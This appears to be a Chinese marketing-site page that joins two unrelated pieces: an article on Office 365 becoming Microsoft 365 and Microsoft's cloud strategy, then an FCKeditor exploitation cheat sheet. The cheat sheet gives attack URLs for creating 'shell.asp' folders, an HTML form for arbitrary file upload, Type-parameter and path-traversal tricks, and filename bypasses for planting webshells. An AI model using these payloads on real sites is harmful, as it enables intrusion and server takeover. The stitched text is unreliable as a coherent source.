整合营销服务商
电脑端+手机端+微信端=数据同步管理
免费咨询热线:
电脑端+手机端+微信端=数据同步管理
免费咨询热线:
020年4月22日开始,微软的Office 365升级为Microsoft 365,发布于2011年6月份的微软云办公应用华丽转身,而这一切其实在6年前就注定了。
2014年2月4日,微软宣布萨提亚·纳德拉出任CEO,这是微软历史上第三位CEO,此前他是微软的云计算部门副总裁,这也是微软董事会最看重的地方之一。
上任之后他带领微软全球业务转型,错失搜索、移动市场的微软不再强求这两个市场,云计算成为新任CEO选择的三个发展方向之一,不只是Windows系统,Office这样的主力软件“云”含量不断提升,直到Microsoft 365全面云化。
2020年正好是Windows版Office问世30年,中国古人常说“三十而立”,微软显然也是想让30岁的Office成家立业,进而开枝散叶,不再作为Windows系统的附庸。
从打字到办公必备 Windows版Office问世30年
微软Office的前身在1980年代就有了,那时候还是Mac和DOS的时代,1985年Office首先出现在Mac平台上,而大家熟悉的Office软件通常是指Windows版Office,1990年11月19日正式推出Office 1.0,那时候还是Windows 2.0时代。
Office 1.0安装界面
Office 1.0一开始就是Word、Excel、PPT三剑客的集成,这个模式几乎贯穿Office整个历史,到现在也没变过,这三个软件是Office最重要的部分。
不过从功能上来看,早期的Office主要作用就是文字编辑,最多再加上表格处理,那时候功能还是比较简单的,远没有现在这么复杂。
从1990年的Office 1.0到最新的Office 2019,Office的办公软件属性都没太大变化,功能及性能当然是越来越强了,其中国人最熟悉的大概是Office 2003了,这与当年Ghost版WinXP在国内的普及有关,WinXP+Office 2003几乎是当时的标配。
Office 2003之后的版本中,Office 2007重做了UI界面,微软引入了Office Fluent功能区,提供了大量常用操作命令,使得Office办公效率大涨。
之后的Office 2010中,也就是在2009年的Win7系统同时,它也开始提供网页版功能,这是Office办公软件变革的开始,从单机向网络协同的方向走了。
之后的Office 2013中,正式开始跟Office 365走到一起,增加了OneDrive网盘,全新的Metro界面更符合平板、手机等移动设备习惯,并支持跨平台的同步。
最新的两版Office就是Office 2016及Office 2019了,继续优化UI界面,其中Word/Excel/PPT三剑客中增加了不少有用的新功能,比如3D模型插入、漏斗图、多条件函数、全新阅读模式、学习工具、语音朗读等,用起来更方便。
微软开辟分支路线:2011年Office 365开始云端化
Office软件前面20年的发展中,基本都是以本地软件出现的,而且与Windows系统的发布密切相关,二者差不多是同代升级,这个阶段也像是游戏发展的单机一样,玩家的工作就像是单机打怪升级。
单机的发展是网游,Office软件也是如此,差不多是在Office 2013发展的同时,微软给Office软件开了一条支线任务——2011年6月份推出了Office 365,将本地的Office软件推向了云端。
Office 365里面的软件包括Word、Excel、Power Point、Outlook、OneNote、Access以及Publisher等等,甚至比本地版Office更多一些,家庭及办公常用的应用几乎都包括进去了。
同时,Office 365还捆绑了微软的OneDrive网盘,可以同步文件资料,不同电脑中使用时可以确保文件是最新的,避免了本地丢失或者不同步等难题。
全面云化之后,用户也不需要关心Office全家桶软件的版本问题,不像之前那样升级一代需要买一代,Office 365会自动更新软件,确保软件都是最新的,在不同平台上使用体验都是一致的,同时安全性也是最高的,不需要用户手动手机补丁。
最后,Office 365的收费机制也不同了,此前的Office是绑定本机的,一次性买断使用,换平台就很麻烦,而Office 365是订阅制,一年支付一次,有个人版、家庭版、教育版及商业版多种选择。
与一次性购买全套Office动辄上千元的价格相比,Office 365的价格也便宜了很多,个人版正常售价是398元一年。
如果是多人应用,家庭版498元一年,支持6个人使用,摊薄下来每年的使用费用便宜多了,大大节省了消费者的开支。
Office 365升级Microsoft 365:筹谋三年 微软全面云化
在即将问世十周年的时候,微软的Office 365在4月21日功成身退,被Microsoft 365取代,后者是微软的最新服务,其实它早在2017年就已经推出了,在替代Office 365这条路上筹备了三年多。
2018年7月份,Microsoft 365上线时,微软副总裁Kirk Koenigsbauer亲自撰文介绍这一创新,宣布Microsoft 365整合了Office 365、Windows 10及企业级移动、安全能力,这套完整而且安全的智慧型解决方案将协助提升员工能力。
Microsoft 365首先是Office 365的超集,后者的功能如桌面Office、1TB OneDrive网盘、安全更新、技术支持都包含在了Microsoft 365之中,而且这次替换是加量不加价,订阅费用并没有变化,个人版 398、6人使用的家庭版498元。
在原有的功能之外,Microsoft 365还加入了一些新功能,特别是与协同办公、AI人工智能、版权资源相关的,主要是:
1、在 Office、OneDrive、Outlook 之外加入Family Safety 和Teams 程序,预览版本预计将于今年推出;
2、加入更多 AI 支持的新功能,比如微软编辑器(Microsoft Editor),为消费者在输入时提供拼写和语法纠错,提供书写建议让表达变得简单易懂。
3、向订阅用户提供了300+高级模板,Getty Images上8000多张精美图片和175个循环视频,以及300种新字体和2800个新图标的独家使用权限,助您创造出更具影响力和视觉吸引力的文档。这些资源同时也可以在Word和Excel中使用。
同时,在中国市场上,Microsoft 365还继续坚持了本地化策略,比如Office 365微助理,它整合了国人更常用的QQ、微信两大IM应用,还推出了可免费使用半年的Teams远程视频应用,在疫情期间用户数增债500%。
总之,在Microsoft 365上,微软这次取代Office 365的动作及时机都很完美,在当前需要大量远程工作的契机下,Microsoft 365凭借更丰富的功能、更安全的连接、更智能的AI、更便捷的远程协作成功上位,完美取代了Office 365,提高了生产效率。
纳德拉的云端战略初见成效 Microsoft 365水到渠成
在纳德拉担任CEO的六年里,微软从搜索、移动业务的失利阴影中成功走了出来,断舍离之后在云计算市场上找到了方向,Office 365相关的业务贡献颇多。今年1月底发布的财报中,Office 365企业级业务营收增长27%,消费级增长19%,Office 365订阅数达到了3720万。
2014年担任CEO之后的第一封公开信中,纳德拉指出微软早期的使命是让PC进入每一个桌面和家庭中,目前在发达国家基本实现了这一目标。
在未来,微软的工作不再是普及PC,而是帮助世界上更多的人去完成工作、娱乐甚至通信,而Microsoft 365取代Office 365是微软战略中的一步,现在来看这一步已经初见成效了,后续的发展当是水到渠成。
jango
FCKeditor/_samples/default.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
fckeditor/editor/filemanager/connectors/test.htmlFCKeditor/_whatsnew.htmlFCKeditor/editor/filemanager/browser/default/connectors/php/config.php影响版本:非优化/精简版本的FCKeditor
脆弱描述:
如果存在以下文件,打开后即可上传文件。
攻击利用:
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.htmlFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML页面中第二行 url=/xxx的部分就是默认基准上传路径
Note:
[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6
[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:FCKeditor v2.4.3中File类别默认拒绝上传类型
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2
允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件
上传后 它保存的文件直接用的
$sFilePath = $sServerDir . $sFileName而没有使用$sExtension为后缀。直接导致在win下在上传文件后面加个.来突破[未测试]。而在apache下,因为”Apache文件名解析缺陷漏洞”也可以利用
附:
测试环境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
1.国外(SSR TEAM)发了多个advisory称Apache’s MIME module (mod_mime)相关漏洞,就是attack.php.rar会被当做php文件执行的漏洞,包括Discuz!那个p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
2.S4T的superhei在blog上发布了这个apache的小特性,即apache 是从后面开始检查后缀,按最后一个合法后缀执行。其实只要看一下apache的htdocs那些默认安装的index.XX文件就明白了。
3.可以充分利用在上传漏洞上,列举如下
影响版本
安装了iis6的服务器(windows2003),受影响的文件名后缀有.asp .asa .cdx .cer .pl .php .cgi
脆弱描述:
利用2003系统路径解析漏洞的原理,创建类似bin.asp如此一般的目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。
攻击利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp强制建立shell.asp目录:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684或者
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。
在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。
成功攻击要求config.php配置文件中启用文件上传,而默认是禁用的。攻击利用:
<form id="frmUpload" enctype="multipart/form-data"
action="http://****XXXX/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>PS:如想尝试v2.2版漏洞,则修改Type=任意值 即可,但注意,如果换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。
影响版本:aspx版FCKeditor
攻击利用:
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.asp影响版本: FCKeditor => 2.4.x
脆弱描述:
我们上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化。
攻击利用:
提交1.php+空格 绕过
ps:※空格只支持win系统
unix是不支持的[1.php和1.php+空格是2个不同的文件]
影响版本:=>2.4.x的最新版已修补
来源:T00LS.Net大佬的解释
由于Fckeditor对第一次上传123.asp;123.jpg 这样的格式做了过滤。也就是IIS6解析漏洞。
上传第一次。被过滤为123_asp;123.jpg 从而无法运行。
但是第2次上传同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已经存在。
文件名被命名为123.asp;123(1).jpg …… 123.asp;123(2).jpg这样的编号方式。
所以。IIS6的漏洞继续执行了。
如果通过上面的步骤进行测试没有成功,可能有以下几方面的原因:
1.FCKeditor没有开启文件上传功能,这项功能在安装FCKeditor时默认是关闭的。如果想上传文件,FCKeditor会给出错误提示。
2.网站采用了精简版的FCKeditor,精简版的FCKeditor很多功能丢失,包括文件上传功能。
3.FCKeditor的这个漏洞已经被修复。
影响版本:Aspx与JSP版FCKeditor
脆弱描述:Getshell请参考“TYPE自定义变量任意上传文件漏洞”
攻击利用:
修改CurrentFolder参数使用 …/…/来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp根据返回的XML信息可以查看网站所有的目录
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F链接上一段
影响版本: 较早版本
脆弱描述:
通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。
攻击利用:
直接修改上传类型参数 直接上传 getshell
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:
http://XXXXX/UserFiles/all/1.asp解释: Type=all 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
例如:
网马就可以传到网站的根目录下.
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp如找不到默认上传文件夹可检查此文件:
*请认真填写需求信息,我们会在24小时内与您取得联系。
